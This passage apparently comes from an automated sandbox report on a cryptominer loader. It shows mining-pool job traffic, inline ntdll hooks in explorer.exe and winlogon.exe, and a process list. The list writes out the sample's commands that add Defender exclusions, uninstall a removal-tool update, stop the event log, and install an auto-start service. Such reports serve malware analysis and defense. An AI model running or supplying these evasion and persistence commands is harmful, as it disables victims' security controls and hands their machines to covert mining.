                                                      2024-10-18 21:11:03 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 37 39 64 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 31 30 32 66 32 38 64 36 32 64 35 38 38 64 30 63 34 65 39 32 66 37 35 64 33 63 65 34 34 62 33 61 36 62 37 37 35 61 63 38 33 32 32 31 34 31 65 62 39 33 35 63 65 31 64 34 65 35 35 37 39 32 38 33 33 31 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 36 33 36 33 32 32 65 63 2d 66 66 32 31 2d 34 35 36 33 2d 39 39 63 37 2d 32 33 37 63 62 39 35 64 35 38 38 34 22 2c 22 74 61
                                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e79dcbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f00000000102f28d62d588d0c4e92f75d3ce44b3a6b775ac8322141eb935ce1d4e557928331","job_id":"636322ec-ff21-4563-99c7-237cb95d5884","ta
                                                      2024-10-18 21:11:25 UTC471INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 64 39 64 63 62 62 38 30 36 37 64 33 31 32 34 30 37 65 37 39 36 33 62 33 65 37 35 38 30 63 65 34 34 35 65 30 63 31 34 64 62 66 61 33 30 32 34 37 36 37 61 38 35 66 65 37 39 35 36 61 65 65 30 32 62 63 39 37 36 61 39 30 66 30 30 30 30 30 30 30 30 31 32 31 31 30 66 64 36 37 64 65 34 64 63 32 36 31 61 37 36 62 37 37 38 31 39 61 31 66 35 37 30 36 38 34 66 35 63 33 36 62 36 30 64 30 30 39 30 35 38 64 35 31 33 31 64 66 63 64 31 39 39 66 64 33 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 66 66 32 61 30 65 39 32 2d 33 64 37 31 2d 34 37 61 65 2d 39 39 36 61 2d 62 38 38 30 38 32 39 61 63 32 63 61 22 2c 22 74 61
                                                      Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010fd9dcbb8067d312407e7963b3e7580ce445e0c14dbfa3024767a85fe7956aee02bc976a90f0000000012110fd67de4dc261a76b77819a1f570684f5c36b60d009058d5131dfcd199fd35","job_id":"ff2a0e92-3d71-47ae-996a-b880829ac2ca","ta


                                                      Code Manipulations

                                                      User Modules

                                                      Hook Summary

                                                      Function NameHook TypeActive in Processes
                                                      ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                      NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                      ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                      NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                      ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                      NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                      NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                      ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                      ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                      NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                      RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                      NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                      NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                      ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                      ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe

                                                      Processes

                                                      Process: explorer.exe, Module: ntdll.dll
                                                      Function NameHook TypeNew Data
                                                      ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                      ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                      Process: winlogon.exe, Module: ntdll.dll
                                                      Function NameHook TypeNew Data
                                                      ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                      NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                      NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                      ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                      RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                      NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                      ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                      ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:17:09:06
                                                      Start date:18/10/2024
                                                      Path:C:\Users\user\Desktop\loader.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\loader.exe"
                                                      Imagebase:0x7ff74aa00000
                                                      File size:5'502'728 bytes
                                                      MD5 hash:CDABDC02374167CCD4938E9FE8C31789
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:17:09:07
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:17:09:07
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:17:09:12
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff64d3d0000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:17:09:12
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:17:09:12
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:17:09:12
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:17:09:12
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:17:09:12
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:17:09:12
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:17:09:13
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\dialer.exe
                                                      Imagebase:0x7ff6480d0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:17:09:13
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:13
                                                      Start time:17:09:13
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:17:09:13
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe delete "NUTGFFPE"
                                                      Imagebase:0x7ff730450000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:16
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:17
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\wusa.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff7494f0000
                                                      File size:345'088 bytes
                                                      MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:18
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe create "NUTGFFPE" binpath= "C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe" start= "auto"
                                                      Imagebase:0x7ff730450000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:19
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:20
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\winlogon.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:winlogon.exe
                                                      Imagebase:0x7ff7cd660000
                                                      File size:906'240 bytes
                                                      MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:21
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                      Imagebase:0x7ff730450000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:22
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\sc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\sc.exe start "NUTGFFPE"
                                                      Imagebase:0x7ff730450000
                                                      File size:72'192 bytes
                                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:23
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:24
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:25
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe
                                                      Imagebase:0x7ff67ba50000
                                                      File size:5'502'728 bytes
                                                      MD5 hash:CDABDC02374167CCD4938E9FE8C31789
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 63%, ReversingLabs
                                                      Has exited:true

                                                      General

                                                      Target ID:26
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\lsass.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\lsass.exe
                                                      Imagebase:0x7ff7a2ae0000
                                                      File size:59'456 bytes
                                                      MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:27
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:28
                                                      Start time:17:09:14
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:29
                                                      Start time:17:09:15
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:30
                                                      Start time:17:09:15
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\dwm.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"dwm.exe"
                                                      Imagebase:0x7ff74e710000
                                                      File size:94'720 bytes
                                                      MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:31
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\cmd.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                      Imagebase:0x7ff64d3d0000
                                                      File size:289'792 bytes
                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:32
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:33
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:34
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:35
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:36
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:37
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\powercfg.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                      Imagebase:0x7ff756950000
                                                      File size:96'256 bytes
                                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:38
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:39
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\dialer.exe
                                                      Imagebase:0x7ff6480d0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:40
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:41
                                                      Start time:17:09:17
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:42
                                                      Start time:17:09:18
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\dialer.exe
                                                      Imagebase:0x7ff6480d0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:43
                                                      Start time:17:09:18
                                                      Start date:18/10/2024
                                                      Path:C:\Windows\System32\dialer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:dialer.exe
                                                      Imagebase:0x7ff6480d0000
                                                      File size:39'936 bytes
                                                      MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
